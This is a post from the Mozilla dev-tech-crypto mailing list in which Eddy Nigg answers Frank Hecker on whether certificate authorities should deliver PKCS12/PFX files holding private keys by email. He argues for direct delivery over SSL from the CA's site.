Frank Hecker: > Eddy Nigg wrote: >> From what I've heard about such practices is, that the PKX file is >> password protected and delivered by simple email. But obviously >> anybody getting hold of the mail and file can easily brute-force >> attack it with a simple script. >> >> I think this is the issue Nelson is addressing. Receiving a PKX file >> from a CA web site doesn't really involve the same risk. > > I'm unclear on what you're saying here: Are you saying that sending a > copy of the PKCS12 file to a user via email is less secure than having > the user go to the web site and retrieve it himself? But if the CA tells > the user where to download the PKCS12 file, and sends those instructions > via email, I'm not sure what the difference would be -- someone could > intercept the email and then download it also.
Yes, you are absolutely correct. More explicit, I meant the difference to be a user induced action which results in the immediate delivery of a PFX file via SSL from CA site. PFX files which include a private key shouldn't be delivered nor retrievable via URL link by email. -- Regards Signer: Eddy Nigg, StartCom Ltd. Jabber: [EMAIL PROTECTED] Blog: https://blog.startcom.org _______________________________________________ dev-tech-crypto mailing list [email protected] https://lists.mozilla.org/listinfo/dev-tech-crypto
